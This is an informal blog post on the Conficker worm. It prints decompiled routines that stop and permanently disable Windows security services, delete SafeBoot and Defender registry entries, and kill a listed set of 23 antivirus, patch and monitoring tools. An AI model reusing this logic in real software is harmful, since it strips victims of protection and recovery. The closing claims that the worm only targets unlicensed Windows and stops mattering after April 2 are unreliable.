April 1 Conficker Virus 2

Below was actual logic of Conficker Virus used to disable the security services. C opens the security manager with all access privileges. It then loops through the set of resident services, ignoring all services reported as kernel devices. If it finds a matching device name, it first shuts down the service, sleeps for 4 seconds, and then sets the service configuration to permanently disable the service.

..

BOOL disable_security_services_and_terminate_conficker_cleaners() { HANDLE v; void *ThreadId; ThreadId = this; disable_security_service("wscsvc"); disable_security_service("WinDefend"); disable_security_service("wuauserv"); disable_security_service("BITS"); disable_security_service("ERSvc"); disable_security_service("WerSvc"); SHDeleteValueA(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion \\Run", "Windows Defender"); callSHDeleteKeyW( HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\explorer\\ShellServiceObjects\\ {FD6905CE-952F-41F1-9A6F-135D9C6622CC}"); callSHDeleteKeyW(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\SafeBoot"); v = CreateThread(0, 0, monitor_and_terminate_conficker_cleaners, 0, 0, (DWORD *) &ThreadId); return CloseHandle(v); } int disable_security_service(LPCSTR lpServiceName) { void *hSCObject; char ServiceStatus; int v; result = 0; hSCObject = OpenSCManagerA(0, 0, SC_MANAGER_ALL_ACCESS); // open service manager with all access granted if ( hSCObject ) { v = OpenServiceA(hSCObject, lpServiceName, 0x20027u); // open the specified service if ( v ) { if ( QueryServiceStatus(v, (struct _SERVICE_STATUS *)&ServiceStatus) ) // query the service status { if ( ServiceType != SERVICE_KERNEL_DRIVER ) // check if the service is not a device driver { success = ControlService(v, 1u, (struct _SERVICE_STATUS *) &ServiceStatus); // notifies the service that it should stop if ( success ) Sleep(4000); // sleep 4 seconds } } result |= ChangeServiceConfigA(v, 0xFFFFFFFFu, 4u, 0xFFFFFFFFu, 0, 0, 0, 0, 0, 0, 0); // set the service configuration so that the service is never started CloseServiceHandle(v); } CloseServiceHandle(hSCObject); } return result; }

Also these processes are immediately terminated by C's process monitoring thread whenever they are discovered running on the victim computer. These were tools seen as treat to its existence in the victims host computer. Seems these virus was protecting itself.

1. autoruns - malware removal tool
   
2. avenger - antivirus / firewall
   
3. confick - cleanup utilities
   
4. downad - cleanup utilities
5. filemon - security utility)
   
6. gmer - rootkit detector and remover (gmer.net)
   
7. hotfix - security patch or removal tools
   
8. kb890 - Microsoft patch
   
9. kb958 - Microsoft patch
   
10. kido - security patch or removal tools
11. klwk - Karspersky malware removal tool
    
12. mbsa. - Microsoft Baseline Security Analyser
    
13. mrt - Microsoft malware removal tool
    
14. mrtstub - Microsoft malware removal tool
15. ms08-06 - Microsoft patch
    
16. procexp - process explorer
    
17. procmon - process monitor
    
18. regmon - registry monitor
    
19. scct_ - unknown
    
20. sysclean - Trend Micro malware removal tool
    
21. tcpview - network packet analysis tool
    
22. unlocker - file unlocking utility
    
23. wireshark - network packet analysis tool

My personal perception was " these virus was for designed specially for those illegally obtained or hacked window version. It is a good worm for flushing out unregistered window version. Wonder why microsoft wants the author of this where in fact this will help themto get rid of all unregistered versions. If you have an authentic window version you dont have to worry a patch from from microsoft will keep you safe from this virus. So much for this one, It will April 2 tommorow so we don`t have to worry for it anymore. Let`s see tommorow and what new on this much talk about virus. ..Godbless